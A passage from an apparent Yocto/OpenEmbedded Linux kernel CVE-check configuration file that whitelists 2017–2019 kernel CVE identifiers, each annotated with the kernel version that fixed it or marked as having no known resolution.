2792CVE_CHECK_WHITELIST += "CVE-2017-7261"
2793
2794# fixed-version: Fixed after version 4.10rc4
2795CVE_CHECK_WHITELIST += "CVE-2017-7273"
2796
2797# fixed-version: Fixed after version 4.11rc4
2798CVE_CHECK_WHITELIST += "CVE-2017-7277"
2799
2800# fixed-version: Fixed after version 4.11rc6
2801CVE_CHECK_WHITELIST += "CVE-2017-7294"
2802
2803# fixed-version: Fixed after version 4.11rc6
2804CVE_CHECK_WHITELIST += "CVE-2017-7308"
2805
2806# fixed-version: Fixed after version 4.12rc5
2807CVE_CHECK_WHITELIST += "CVE-2017-7346"
2808
2809# CVE-2017-7369 has no known resolution
2810
2811# fixed-version: Fixed after version 4.11rc4
2812CVE_CHECK_WHITELIST += "CVE-2017-7374"
2813
2814# fixed-version: Fixed after version 4.11rc8
2815CVE_CHECK_WHITELIST += "CVE-2017-7472"
2816
2817# fixed-version: Fixed after version 4.11
2818CVE_CHECK_WHITELIST += "CVE-2017-7477"
2819
2820# fixed-version: Fixed after version 4.12rc7
2821CVE_CHECK_WHITELIST += "CVE-2017-7482"
2822
2823# fixed-version: Fixed after version 4.12rc1
2824CVE_CHECK_WHITELIST += "CVE-2017-7487"
2825
2826# fixed-version: Fixed after version 4.7rc1
2827CVE_CHECK_WHITELIST += "CVE-2017-7495"
2828
2829# fixed-version: Fixed after version 4.12rc7
2830CVE_CHECK_WHITELIST += "CVE-2017-7518"
2831
2832# fixed-version: Fixed after version 4.13rc1
2833CVE_CHECK_WHITELIST += "CVE-2017-7533"
2834
2835# fixed-version: Fixed after version 4.13rc1
2836CVE_CHECK_WHITELIST += "CVE-2017-7541"
2837
2838# fixed-version: Fixed after version 4.13rc2
2839CVE_CHECK_WHITELIST += "CVE-2017-7542"
2840
2841# fixed-version: Fixed after version 4.13
2842CVE_CHECK_WHITELIST += "CVE-2017-7558"
2843
2844# fixed-version: Fixed after version 4.11rc6
2845CVE_CHECK_WHITELIST += "CVE-2017-7616"
2846
2847# fixed-version: Fixed after version 4.11rc8
2848CVE_CHECK_WHITELIST += "CVE-2017-7618"
2849
2850# fixed-version: Fixed after version 4.11
2851CVE_CHECK_WHITELIST += "CVE-2017-7645"
2852
2853# fixed-version: Fixed after version 4.11rc7
2854CVE_CHECK_WHITELIST += "CVE-2017-7889"
2855
2856# fixed-version: Fixed after version 4.11
2857CVE_CHECK_WHITELIST += "CVE-2017-7895"
2858
2859# fixed-version: Fixed after version 4.11rc8
2860CVE_CHECK_WHITELIST += "CVE-2017-7979"
2861
2862# fixed-version: Fixed after version 4.11rc4
2863CVE_CHECK_WHITELIST += "CVE-2017-8061"
2864
2865# fixed-version: Fixed after version 4.11rc2
2866CVE_CHECK_WHITELIST += "CVE-2017-8062"
2867
2868# fixed-version: Fixed after version 4.11rc1
2869CVE_CHECK_WHITELIST += "CVE-2017-8063"
2870
2871# fixed-version: Fixed after version 4.11rc1
2872CVE_CHECK_WHITELIST += "CVE-2017-8064"
2873
2874# fixed-version: Fixed after version 4.11rc1
2875CVE_CHECK_WHITELIST += "CVE-2017-8065"
2876
2877# fixed-version: Fixed after version 4.11rc1
2878CVE_CHECK_WHITELIST += "CVE-2017-8066"
2879
2880# fixed-version: Fixed after version 4.11rc1
2881CVE_CHECK_WHITELIST += "CVE-2017-8067"
2882
2883# fixed-version: Fixed after version 4.10rc8
2884CVE_CHECK_WHITELIST += "CVE-2017-8068"
2885
2886# fixed-version: Fixed after version 4.10rc8
2887CVE_CHECK_WHITELIST += "CVE-2017-8069"
2888
2889# fixed-version: Fixed after version 4.10rc8
2890CVE_CHECK_WHITELIST += "CVE-2017-8070"
2891
2892# fixed-version: Fixed after version 4.10rc7
2893CVE_CHECK_WHITELIST += "CVE-2017-8071"
2894
2895# fixed-version: Fixed after version 4.10rc7
2896CVE_CHECK_WHITELIST += "CVE-2017-8072"
2897
2898# fixed-version: Fixed after version 3.16rc1
2899CVE_CHECK_WHITELIST += "CVE-2017-8106"
2900
2901# fixed-version: Fixed after version 3.19rc6
2902CVE_CHECK_WHITELIST += "CVE-2017-8240"
2903
2904# CVE-2017-8242 has no known resolution
2905
2906# CVE-2017-8244 has no known resolution
2907
2908# CVE-2017-8245 has no known resolution
2909
2910# CVE-2017-8246 has no known resolution
2911
2912# fixed-version: Fixed after version 4.12rc1
2913CVE_CHECK_WHITELIST += "CVE-2017-8797"
2914
2915# fixed-version: Fixed after version 4.15rc3
2916CVE_CHECK_WHITELIST += "CVE-2017-8824"
2917
2918# fixed-version: Fixed after version 4.13rc1
2919CVE_CHECK_WHITELIST += "CVE-2017-8831"
2920
2921# fixed-version: Fixed after version 4.12rc1
2922CVE_CHECK_WHITELIST += "CVE-2017-8890"
2923
2924# fixed-version: Fixed after version 4.11rc2
2925CVE_CHECK_WHITELIST += "CVE-2017-8924"
2926
2927# fixed-version: Fixed after version 4.11rc2
2928CVE_CHECK_WHITELIST += "CVE-2017-8925"
2929
2930# fixed-version: Fixed after version 4.12rc1
2931CVE_CHECK_WHITELIST += "CVE-2017-9059"
2932
2933# fixed-version: Fixed after version 4.12rc2
2934CVE_CHECK_WHITELIST += "CVE-2017-9074"
2935
2936# fixed-version: Fixed after version 4.12rc2
2937CVE_CHECK_WHITELIST += "CVE-2017-9075"
2938
2939# fixed-version: Fixed after version 4.12rc2
2940CVE_CHECK_WHITELIST += "CVE-2017-9076"
2941
2942# fixed-version: Fixed after version 4.12rc2
2943CVE_CHECK_WHITELIST += "CVE-2017-9077"
2944
2945# fixed-version: Fixed after version 4.12rc1
2946CVE_CHECK_WHITELIST += "CVE-2017-9150"
2947
2948# fixed-version: Fixed after version 4.12rc3
2949CVE_CHECK_WHITELIST += "CVE-2017-9211"
2950
2951# fixed-version: Fixed after version 4.12rc3
2952CVE_CHECK_WHITELIST += "CVE-2017-9242"
2953
2954# fixed-version: Fixed after version 4.12rc5
2955CVE_CHECK_WHITELIST += "CVE-2017-9605"
2956
2957# fixed-version: Fixed after version 4.3rc7
2958CVE_CHECK_WHITELIST += "CVE-2017-9725"
2959
2960# fixed-version: Fixed after version 4.13rc1
2961CVE_CHECK_WHITELIST += "CVE-2017-9984"
2962
2963# fixed-version: Fixed after version 4.13rc1
2964CVE_CHECK_WHITELIST += "CVE-2017-9985"
2965
2966# fixed-version: Fixed after version 4.15rc1
2967CVE_CHECK_WHITELIST += "CVE-2017-9986"
2968
2969# fixed-version: Fixed after version 4.15rc9
2970CVE_CHECK_WHITELIST += "CVE-2018-1000004"
2971
2972# fixed-version: Fixed after version 4.16rc1
2973CVE_CHECK_WHITELIST += "CVE-2018-1000026"
2974
2975# fixed-version: Fixed after version 4.15
2976CVE_CHECK_WHITELIST += "CVE-2018-1000028"
2977
2978# fixed-version: Fixed after version 4.16
2979CVE_CHECK_WHITELIST += "CVE-2018-1000199"
2980
2981# fixed-version: Fixed after version 4.17rc5
2982CVE_CHECK_WHITELIST += "CVE-2018-1000200"
2983
2984# fixed-version: Fixed after version 4.17rc7
2985CVE_CHECK_WHITELIST += "CVE-2018-1000204"
2986
2987# fixed-version: Fixed after version 4.16rc7
2988CVE_CHECK_WHITELIST += "CVE-2018-10021"
2989
2990# fixed-version: Fixed after version 4.16rc7
2991CVE_CHECK_WHITELIST += "CVE-2018-10074"
2992
2993# fixed-version: Fixed after version 4.13rc1
2994CVE_CHECK_WHITELIST += "CVE-2018-10087"
2995
2996# fixed-version: Fixed after version 4.13rc1
2997CVE_CHECK_WHITELIST += "CVE-2018-10124"
2998
2999# fixed-version: Fixed after version 4.17rc4
3000CVE_CHECK_WHITELIST += "CVE-2018-10322"
3001
3002# fixed-version: Fixed after version 4.17rc4
3003CVE_CHECK_WHITELIST += "CVE-2018-10323"
3004
3005# fixed-version: Fixed after version 4.16rc3
3006CVE_CHECK_WHITELIST += "CVE-2018-1065"
3007
3008# fixed-version: Fixed after version 4.11rc1
3009CVE_CHECK_WHITELIST += "CVE-2018-1066"
3010
3011# fixed-version: Fixed after version 4.13rc6
3012CVE_CHECK_WHITELIST += "CVE-2018-10675"
3013
3014# fixed-version: Fixed after version 4.16rc5
3015CVE_CHECK_WHITELIST += "CVE-2018-1068"
3016
3017# fixed-version: Fixed after version 4.18rc1
3018CVE_CHECK_WHITELIST += "CVE-2018-10840"
3019
3020# fixed-version: Fixed after version 4.18rc1
3021CVE_CHECK_WHITELIST += "CVE-2018-10853"
3022
3023# fixed-version: Fixed after version 4.16rc7
3024CVE_CHECK_WHITELIST += "CVE-2018-1087"
3025
3026# CVE-2018-10872 has no known resolution
3027
3028# fixed-version: Fixed after version 4.18rc4
3029CVE_CHECK_WHITELIST += "CVE-2018-10876"
3030
3031# fixed-version: Fixed after version 4.18rc4
3032CVE_CHECK_WHITELIST += "CVE-2018-10877"
3033
3034# fixed-version: Fixed after version 4.18rc4
3035CVE_CHECK_WHITELIST += "CVE-2018-10878"
3036
3037# fixed-version: Fixed after version 4.18rc4
3038CVE_CHECK_WHITELIST += "CVE-2018-10879"
3039
3040# fixed-version: Fixed after version 4.18rc4
3041CVE_CHECK_WHITELIST += "CVE-2018-10880"
3042
3043# fixed-version: Fixed after version 4.18rc4
3044CVE_CHECK_WHITELIST += "CVE-2018-10881"
3045
3046# fixed-version: Fixed after version 4.18rc4
3047CVE_CHECK_WHITELIST += "CVE-2018-10882"
3048
3049# fixed-version: Fixed after version 4.18rc4
3050CVE_CHECK_WHITELIST += "CVE-2018-10883"
3051
3052# fixed-version: Fixed after version 2.6.36rc1
3053CVE_CHECK_WHITELIST += "CVE-2018-10901"
3054
3055# fixed-version: Fixed after version 4.18rc6
3056CVE_CHECK_WHITELIST += "CVE-2018-10902"
3057
3058# fixed-version: Fixed after version 4.14rc2
3059CVE_CHECK_WHITELIST += "CVE-2018-1091"
3060
3061# fixed-version: Fixed after version 4.17rc1
3062CVE_CHECK_WHITELIST += "CVE-2018-1092"
3063
3064# fixed-version: Fixed after version 4.17rc1
3065CVE_CHECK_WHITELIST += "CVE-2018-1093"
3066
3067# fixed-version: Fixed after version 4.13rc5
3068CVE_CHECK_WHITELIST += "CVE-2018-10938"
3069
3070# fixed-version: Fixed after version 4.17rc1
3071CVE_CHECK_WHITELIST += "CVE-2018-1094"
3072
3073# fixed-version: Fixed after version 4.17rc3
3074CVE_CHECK_WHITELIST += "CVE-2018-10940"
3075
3076# fixed-version: Fixed after version 4.17rc1
3077CVE_CHECK_WHITELIST += "CVE-2018-1095"
3078
3079# fixed-version: Fixed after version 4.17rc2
3080CVE_CHECK_WHITELIST += "CVE-2018-1108"
3081
3082# fixed-version: Fixed after version 4.18rc1
3083CVE_CHECK_WHITELIST += "CVE-2018-1118"
3084
3085# fixed-version: Fixed after version 4.17rc6
3086CVE_CHECK_WHITELIST += "CVE-2018-1120"
3087
3088# CVE-2018-1121 has no known resolution
3089
3090# fixed-version: Fixed after version 4.11rc1
3091CVE_CHECK_WHITELIST += "CVE-2018-11232"
3092
3093# fixed-version: Fixed after version 4.19rc1
3094CVE_CHECK_WHITELIST += "CVE-2018-1128"
3095
3096# fixed-version: Fixed after version 4.19rc1
3097CVE_CHECK_WHITELIST += "CVE-2018-1129"
3098
3099# fixed-version: Fixed after version 4.16rc7
3100CVE_CHECK_WHITELIST += "CVE-2018-1130"
3101
3102# fixed-version: Fixed after version 4.18rc1
3103CVE_CHECK_WHITELIST += "CVE-2018-11412"
3104
3105# fixed-version: Fixed after version 4.17rc7
3106CVE_CHECK_WHITELIST += "CVE-2018-11506"
3107
3108# fixed-version: Fixed after version 4.17rc5
3109CVE_CHECK_WHITELIST += "CVE-2018-11508"
3110
3111# CVE-2018-11987 has no known resolution
3112
3113# fixed-version: Fixed after version 5.2rc1
3114CVE_CHECK_WHITELIST += "CVE-2018-12126"
3115
3116# fixed-version: Fixed after version 5.2rc1
3117CVE_CHECK_WHITELIST += "CVE-2018-12127"
3118
3119# fixed-version: Fixed after version 5.2rc1
3120CVE_CHECK_WHITELIST += "CVE-2018-12130"
3121
3122# fixed-version: Fixed after version 5.4rc2
3123CVE_CHECK_WHITELIST += "CVE-2018-12207"
3124
3125# fixed-version: Fixed after version 4.18rc1
3126CVE_CHECK_WHITELIST += "CVE-2018-12232"
3127
3128# fixed-version: Fixed after version 4.18rc2
3129CVE_CHECK_WHITELIST += "CVE-2018-12233"
3130
3131# fixed-version: Fixed after version 4.18rc1
3132CVE_CHECK_WHITELIST += "CVE-2018-12633"
3133
3134# fixed-version: Fixed after version 4.18rc2
3135CVE_CHECK_WHITELIST += "CVE-2018-12714"
3136
3137# fixed-version: Fixed after version 4.19rc1
3138CVE_CHECK_WHITELIST += "CVE-2018-12896"
3139
3140# fixed-version: Fixed after version 4.18rc1
3141CVE_CHECK_WHITELIST += "CVE-2018-12904"
3142
3143# CVE-2018-12928 has no known resolution
3144
3145# CVE-2018-12929 has no known resolution
3146
3147# CVE-2018-12930 has no known resolution
3148
3149# CVE-2018-12931 has no known resolution
3150
3151# fixed-version: Fixed after version 4.19rc1
3152CVE_CHECK_WHITELIST += "CVE-2018-13053"
3153
3154# fixed-version: Fixed after version 4.18rc1
3155CVE_CHECK_WHITELIST += "CVE-2018-13093"
3156
3157# fixed-version: Fixed after version 4.18rc1
3158CVE_CHECK_WHITELIST += "CVE-2018-13094"
3159
3160# fixed-version: Fixed after version 4.18rc3
3161CVE_CHECK_WHITELIST += "CVE-2018-13095"
3162
3163# fixed-version: Fixed after version 4.19rc1
3164CVE_CHECK_WHITELIST += "CVE-2018-13096"
3165
3166# fixed-version: Fixed after version 4.19rc1
3167CVE_CHECK_WHITELIST += "CVE-2018-13097"
3168
3169# fixed-version: Fixed after version 4.19rc1
3170CVE_CHECK_WHITELIST += "CVE-2018-13098"
3171
3172# fixed-version: Fixed after version 4.19rc1
3173CVE_CHECK_WHITELIST += "CVE-2018-13099"
3174
3175# fixed-version: Fixed after version 4.19rc1
3176CVE_CHECK_WHITELIST += "CVE-2018-13100"
3177
3178# fixed-version: Fixed after version 4.18rc4
3179CVE_CHECK_WHITELIST += "CVE-2018-13405"
3180
3181# fixed-version: Fixed after version 4.18rc1
3182CVE_CHECK_WHITELIST += "CVE-2018-13406"
3183
3184# fixed-version: Fixed after version 4.19rc1
3185CVE_CHECK_WHITELIST += "CVE-2018-14609"
3186
3187# fixed-version: Fixed after version 4.19rc1
3188CVE_CHECK_WHITELIST += "CVE-2018-14610"
3189
3190# fixed-version: Fixed after version 4.19rc1
3191CVE_CHECK_WHITELIST += "CVE-2018-14611"
3192
3193# fixed-version: Fixed after version 4.19rc1
3194CVE_CHECK_WHITELIST += "CVE-2018-14612"
3195
3196# fixed-version: Fixed after version 4.19rc1
3197CVE_CHECK_WHITELIST += "CVE-2018-14613"
3198
3199# fixed-version: Fixed after version 4.19rc1
3200CVE_CHECK_WHITELIST += "CVE-2018-14614"
3201
3202# fixed-version: Fixed after version 4.19rc1
3203CVE_CHECK_WHITELIST += "CVE-2018-14615"
3204
3205# fixed-version: Fixed after version 4.19rc1
3206CVE_CHECK_WHITELIST += "CVE-2018-14616"
3207
3208# fixed-version: Fixed after version 4.19rc1
3209CVE_CHECK_WHITELIST += "CVE-2018-14617"
3210
3211# fixed-version: Fixed after version 4.15rc4
3212CVE_CHECK_WHITELIST += "CVE-2018-14619"
3213
3214# fixed-version: Fixed after version 4.20rc6
3215CVE_CHECK_WHITELIST += "CVE-2018-14625"
3216
3217# fixed-version: Fixed after version 4.19rc6
3218CVE_CHECK_WHITELIST += "CVE-2018-14633"
3219
3220# fixed-version: Fixed after version 4.13rc1
3221CVE_CHECK_WHITELIST += "CVE-2018-14634"
3222
3223# fixed-version: Fixed after version 4.19rc4
3224CVE_CHECK_WHITELIST += "CVE-2018-14641"
3225
3226# fixed-version: Fixed after version 4.15rc8
3227CVE_CHECK_WHITELIST += "CVE-2018-14646"
3228
3229# fixed-version: Fixed after version 4.19rc2
3230CVE_CHECK_WHITELIST += "CVE-2018-14656"
3231
3232# fixed-version: Fixed after version 4.18rc8
3233CVE_CHECK_WHITELIST += "CVE-2018-14678"
3234
3235# fixed-version: Fixed after version 4.18rc1
3236CVE_CHECK_WHITELIST += "CVE-2018-14734"
3237
3238# fixed-version: Fixed after version 4.19rc7
3239CVE_CHECK_WHITELIST += "CVE-2018-15471"
3240
3241# fixed-version: Fixed after version 4.19rc1
3242CVE_CHECK_WHITELIST += "CVE-2018-15572"
3243
3244# fixed-version: Fixed after version 4.19rc1
3245CVE_CHECK_WHITELIST += "CVE-2018-15594"
3246
3247# fixed-version: Fixed after version 4.18rc5
3248CVE_CHECK_WHITELIST += "CVE-2018-16276"
3249
3250# fixed-version: Fixed after version 4.8rc1
3251CVE_CHECK_WHITELIST += "CVE-2018-16597"
3252
3253# fixed-version: Fixed after version 4.19rc2
3254CVE_CHECK_WHITELIST += "CVE-2018-16658"
3255
3256# fixed-version: Fixed after version 4.20rc5
3257CVE_CHECK_WHITELIST += "CVE-2018-16862"
3258
3259# fixed-version: Fixed after version 4.20rc3
3260CVE_CHECK_WHITELIST += "CVE-2018-16871"
3261
3262# fixed-version: Fixed after version 5.0rc5
3263CVE_CHECK_WHITELIST += "CVE-2018-16880"
3264
3265# fixed-version: Fixed after version 4.20
3266CVE_CHECK_WHITELIST += "CVE-2018-16882"
3267
3268# fixed-version: Fixed after version 5.0rc1
3269CVE_CHECK_WHITELIST += "CVE-2018-16884"
3270
3271# CVE-2018-16885 has no known resolution
3272
3273# fixed-version: Fixed after version 4.19rc4
3274CVE_CHECK_WHITELIST += "CVE-2018-17182"
3275
3276# fixed-version: Fixed after version 4.19rc7
3277CVE_CHECK_WHITELIST += "CVE-2018-17972"
3278
3279# CVE-2018-17977 has no known resolution
3280
3281# fixed-version: Fixed after version 4.19rc7
3282CVE_CHECK_WHITELIST += "CVE-2018-18021"
3283
3284# fixed-version: Fixed after version 4.19
3285CVE_CHECK_WHITELIST += "CVE-2018-18281"
3286
3287# fixed-version: Fixed after version 4.15rc6
3288CVE_CHECK_WHITELIST += "CVE-2018-18386"
3289
3290# fixed-version: Fixed after version 4.20rc5
3291CVE_CHECK_WHITELIST += "CVE-2018-18397"
3292
3293# fixed-version: Fixed after version 4.19rc7
3294CVE_CHECK_WHITELIST += "CVE-2018-18445"
3295
3296# fixed-version: Fixed after version 4.15rc2
3297CVE_CHECK_WHITELIST += "CVE-2018-18559"
3298
3299# CVE-2018-18653 has no known resolution
3300
3301# fixed-version: Fixed after version 4.17rc4
3302CVE_CHECK_WHITELIST += "CVE-2018-18690"
3303
3304# fixed-version: Fixed after version 4.20rc1
3305CVE_CHECK_WHITELIST += "CVE-2018-18710"
3306
3307# fixed-version: Fixed after version 4.20rc2
3308CVE_CHECK_WHITELIST += "CVE-2018-18955"
3309
3310# fixed-version: Fixed after version 4.20rc5
3311CVE_CHECK_WHITELIST += "CVE-2018-19406"
3312
3313# fixed-version: Fixed after version 4.20rc5
3314CVE_CHECK_WHITELIST += "CVE-2018-19407"
3315
3316# fixed-version: Fixed after version 4.20rc6
3317CVE_CHECK_WHITELIST += "CVE-2018-19824"
3318
3319# fixed-version: Fixed after version 4.20rc3
3320CVE_CHECK_WHITELIST += "CVE-2018-19854"
3321
3322# fixed-version: Fixed after version 4.20
3323CVE_CHECK_WHITELIST += "CVE-2018-19985"
3324
3325# fixed-version: Fixed after version 4.20rc6
3326CVE_CHECK_WHITELIST += "CVE-2018-20169"
3327
3328# fixed-version: Fixed after version 4.15rc2
3329CVE_CHECK_WHITELIST += "CVE-2018-20449"
3330
3331# fixed-version: Fixed after version 4.14rc1
3332CVE_CHECK_WHITELIST += "CVE-2018-20509"
3333
3334# fixed-version: Fixed after version 4.16rc3
3335CVE_CHECK_WHITELIST += "CVE-2018-20510"
3336
3337# fixed-version: Fixed after version 4.19rc5
3338CVE_CHECK_WHITELIST += "CVE-2018-20511"
3339
3340# fixed-version: Fixed after version 5.0rc1
3341CVE_CHECK_WHITELIST += "CVE-2018-20669"
3342
3343# fixed-version: Fixed after version 5.0rc1
3344CVE_CHECK_WHITELIST += "CVE-2018-20784"
3345
3346# fixed-version: Fixed after version 4.20rc1
3347CVE_CHECK_WHITELIST += "CVE-2018-20836"
3348
3349# fixed-version: Fixed after version 4.20rc1
3350CVE_CHECK_WHITELIST += "CVE-2018-20854"
3351
3352# fixed-version: Fixed after version 4.19rc1
3353CVE_CHECK_WHITELIST += "CVE-2018-20855"
3354
3355# fixed-version: Fixed after version 4.19rc1
3356CVE_CHECK_WHITELIST += "CVE-2018-20856"
3357
3358# fixed-version: Fixed after version 4.17rc1
3359CVE_CHECK_WHITELIST += "CVE-2018-20961"
3360
3361# fixed-version: Fixed after version 4.18rc1
3362CVE_CHECK_WHITELIST += "CVE-2018-20976"
3363
3364# fixed-version: Fixed after version 4.18rc1
3365CVE_CHECK_WHITELIST += "CVE-2018-21008"
3366
3367# fixed-version: Fixed after version 4.15rc9
3368CVE_CHECK_WHITELIST += "CVE-2018-25015"
3369
3370# fixed-version: Fixed after version 4.17rc7
3371CVE_CHECK_WHITELIST += "CVE-2018-25020"
3372
3373# CVE-2018-3574 has no known resolution
3374
3375# fixed-version: Fixed after version 4.19rc1
3376CVE_CHECK_WHITELIST += "CVE-2018-3620"
3377
3378# fixed-version: Fixed after version 4.17rc7
3379CVE_CHECK_WHITELIST += "CVE-2018-3639"
3380
3381# fixed-version: Fixed after version 4.19rc1
3382CVE_CHECK_WHITELIST += "CVE-2018-3646"
3383
3384# fixed-version: Fixed after version 3.7rc1
3385CVE_CHECK_WHITELIST += "CVE-2018-3665"
3386
3387# fixed-version: Fixed after version 4.19rc1
3388CVE_CHECK_WHITELIST += "CVE-2018-3693"
3389
3390# fixed-version: Fixed after version 4.15rc8
3391CVE_CHECK_WHITELIST += "CVE-2018-5332"
3392
3393# fixed-version: Fixed after version 4.15rc8
3394CVE_CHECK_WHITELIST += "CVE-2018-5333"
3395
3396# fixed-version: Fixed after version 4.15rc8
3397CVE_CHECK_WHITELIST += "CVE-2018-5344"
3398
3399# fixed-version: Fixed after version 4.18rc7
3400CVE_CHECK_WHITELIST += "CVE-2018-5390"
3401
3402# fixed-version: Fixed after version 4.19rc1
3403CVE_CHECK_WHITELIST += "CVE-2018-5391"
3404
3405# fixed-version: Fixed after version 4.16rc5
3406CVE_CHECK_WHITELIST += "CVE-2018-5703"
3407
3408# fixed-version: Fixed after version 4.16rc1
3409CVE_CHECK_WHITELIST += "CVE-2018-5750"
3410
3411# fixed-version: Fixed after version 4.16rc1
3412CVE_CHECK_WHITELIST += "CVE-2018-5803"
3413
3414# fixed-version: Fixed after version 4.17rc6
3415CVE_CHECK_WHITELIST += "CVE-2018-5814"
3416
3417# fixed-version: Fixed after version 4.16rc1
3418CVE_CHECK_WHITELIST += "CVE-2018-5848"
3419
3420# Skipping CVE-2018-5856, no affected_versions
3421
3422# fixed-version: Fixed after version 4.11rc8
3423CVE_CHECK_WHITELIST += "CVE-2018-5873"
3424
3425# fixed-version: Fixed after version 4.15rc2
3426CVE_CHECK_WHITELIST += "CVE-2018-5953"
3427
3428# fixed-version: Fixed after version 4.15rc2
3429CVE_CHECK_WHITELIST += "CVE-2018-5995"
3430
3431# fixed-version: Fixed after version 4.16rc5
3432CVE_CHECK_WHITELIST += "CVE-2018-6412"
3433
3434# fixed-version: Fixed after version 4.17rc1
3435CVE_CHECK_WHITELIST += "CVE-2018-6554"
3436
3437# fixed-version: Fixed after version 4.17rc1
3438CVE_CHECK_WHITELIST += "CVE-2018-6555"
3439
3440# CVE-2018-6559 has no known resolution
3441
3442# fixed-version: Fixed after version 4.15rc9
3443CVE_CHECK_WHITELIST += "CVE-2018-6927"
3444
3445# fixed-version: Fixed after version 4.14rc6
3446CVE_CHECK_WHITELIST += "CVE-2018-7191"
3447
3448# fixed-version: Fixed after version 4.15rc2
3449CVE_CHECK_WHITELIST += "CVE-2018-7273"
3450
3451# fixed-version: Fixed after version 4.11rc1
3452CVE_CHECK_WHITELIST += "CVE-2018-7480"
3453
3454# fixed-version: Fixed after version 4.15rc3
3455CVE_CHECK_WHITELIST += "CVE-2018-7492"
3456
3457# fixed-version: Fixed after version 4.16rc2
3458CVE_CHECK_WHITELIST += "CVE-2018-7566"
3459
3460# fixed-version: Fixed after version 4.16rc7
3461CVE_CHECK_WHITELIST += "CVE-2018-7740"
3462
3463# fixed-version: Fixed after version 4.15rc2
3464CVE_CHECK_WHITELIST += "CVE-2018-7754"
3465
3466# fixed-version: Fixed after version 4.19rc5
3467CVE_CHECK_WHITELIST += "CVE-2018-7755"
3468
3469# fixed-version: Fixed after version 4.16rc1
3470CVE_CHECK_WHITELIST += "CVE-2018-7757"
3471
3472# fixed-version: Fixed after version 4.16rc5
3473CVE_CHECK_WHITELIST += "CVE-2018-7995"
3474
3475# fixed-version: Fixed after version 4.16rc1
3476CVE_CHECK_WHITELIST += "CVE-2018-8043"
3477
3478# fixed-version: Fixed after version 4.16rc1
3479CVE_CHECK_WHITELIST += "CVE-2018-8087"
3480
3481# fixed-version: Fixed after version 4.16rc7
3482CVE_CHECK_WHITELIST += "CVE-2018-8781"
3483
3484# fixed-version: Fixed after version 4.16rc7
3485CVE_CHECK_WHITELIST += "CVE-2018-8822"
3486
3487# fixed-version: Fixed after version 4.16rc7
3488CVE_CHECK_WHITELIST += "CVE-2018-8897"
3489
3490# fixed-version: Fixed after version 4.19rc1
3491CVE_CHECK_WHITELIST += "CVE-2018-9363"
3492
3493# fixed-version: Fixed after version 4.17rc3
3494CVE_CHECK_WHITELIST += "CVE-2018-9385"
3495
3496# fixed-version: Fixed after version 4.17rc3
3497CVE_CHECK_WHITELIST += "CVE-2018-9415"
3498
3499# fixed-version: Fixed after version 4.6rc1
3500CVE_CHECK_WHITELIST += "CVE-2018-9422"
3501
3502# fixed-version: Fixed after version 4.15rc6
3503CVE_CHECK_WHITELIST += "CVE-2018-9465"
3504
3505# fixed-version: Fixed after version 4.18rc5
3506CVE_CHECK_WHITELIST += "CVE-2018-9516"
3507
3508# fixed-version: Fixed after version 4.14rc1
3509CVE_CHECK_WHITELIST += "CVE-2018-9517"
3510
3511# fixed-version: Fixed after version 4.16rc3
3512CVE_CHECK_WHITELIST += "CVE-2018-9518"
3513
3514# fixed-version: Fixed after version 4.14rc4
3515CVE_CHECK_WHITELIST += "CVE-2018-9568"
3516
3517# fixed-version: Fixed after version 5.2rc6
3518CVE_CHECK_WHITELIST += "CVE-2019-0136"
3519
3520# fixed-version: Fixed after version 5.2rc1
3521CVE_CHECK_WHITELIST += "CVE-2019-0145"
3522
3523# fixed-version: Fixed after version 5.2rc1
3524CVE_CHECK_WHITELIST += "CVE-2019-0146"
3525
3526# fixed-version: Fixed after version 5.2rc1
3527CVE_CHECK_WHITELIST += "CVE-2019-0147"
3528
3529# fixed-version: Fixed after version 5.2rc1
3530CVE_CHECK_WHITELIST += "CVE-2019-0148"
3531
3532# fixed-version: Fixed after version 5.3rc1
3533CVE_CHECK_WHITELIST += "CVE-2019-0149"
3534
3535# fixed-version: Fixed after version 5.4rc8
3536CVE_CHECK_WHITELIST += "CVE-2019-0154"
3537
3538# fixed-version: Fixed after version 5.4rc8
3539CVE_CHECK_WHITELIST += "CVE-2019-0155"
3540
3541# fixed-version: Fixed after version 5.1rc1
3542CVE_CHECK_WHITELIST += "CVE-2019-10124"
3543
3544# fixed-version: Fixed after version 5.1rc1
3545CVE_CHECK_WHITELIST += "CVE-2019-10125"
3546
3547# fixed-version: Fixed after version 5.2rc6
3548CVE_CHECK_WHITELIST += "CVE-2019-10126"
3549
3550# CVE-2019-10140 has no known resolution
3551
3552# fixed-version: Fixed after version 5.2rc1
3553CVE_CHECK_WHITELIST += "CVE-2019-10142"
3554
3555# fixed-version: Fixed after version 5.3rc3
3556CVE_CHECK_WHITELIST += "CVE-2019-10207"
3557
3558# fixed-version: Fixed after version 5.4rc2
3559CVE_CHECK_WHITELIST += "CVE-2019-10220"
3560
3561# fixed-version: Fixed after version 5.2rc1
3562CVE_CHECK_WHITELIST += "CVE-2019-10638"
3563
3564# fixed-version: Fixed after version 5.1rc4
3565CVE_CHECK_WHITELIST += "CVE-2019-10639"
3566
3567# fixed-version: Fixed after version 5.0rc3
3568CVE_CHECK_WHITELIST += "CVE-2019-11085"
3569
3570# fixed-version: Fixed after version 5.2rc1
3571CVE_CHECK_WHITELIST += "CVE-2019-11091"
3572
3573# fixed-version: Fixed after version 5.4rc8
3574CVE_CHECK_WHITELIST += "CVE-2019-11135"
3575
3576# fixed-version: Fixed after version 4.8rc5
3577CVE_CHECK_WHITELIST += "CVE-2019-11190"
3578
3579# fixed-version: Fixed after version 5.1rc1
3580CVE_CHECK_WHITELIST += "CVE-2019-11191"
3581
3582# fixed-version: Fixed after version 5.3rc4
3583CVE_CHECK_WHITELIST += "CVE-2019-1125"
3584
3585# fixed-version: Fixed after version 5.2rc6
3586CVE_CHECK_WHITELIST += "CVE-2019-11477"
3587
3588# fixed-version: Fixed after version 5.2rc6
3589CVE_CHECK_WHITELIST += "CVE-2019-11478"
3590
3591# fixed-version: Fixed after version 5.2rc6
3592CVE_CHECK_WHITELIST += "CVE-2019-11479"
3593
3594# fixed-version: Fixed after version 5.1rc4
3595CVE_CHECK_WHITELIST += "CVE-2019-11486"
3596
3597# fixed-version: Fixed after version 5.1rc5
3598CVE_CHECK_WHITELIST += "CVE-2019-11487"
3599
3600# fixed-version: Fixed after version 5.1rc6
3601CVE_CHECK_WHITELIST += "CVE-2019-11599"
3602
3603# fixed-version: Fixed after version 5.1
3604CVE_CHECK_WHITELIST += "CVE-2019-11683"
3605
3606# fixed-version: Fixed after version 5.1rc1
3607CVE_CHECK_WHITELIST += "CVE-2019-11810"
3608
3609# fixed-version: Fixed after version 5.1rc1
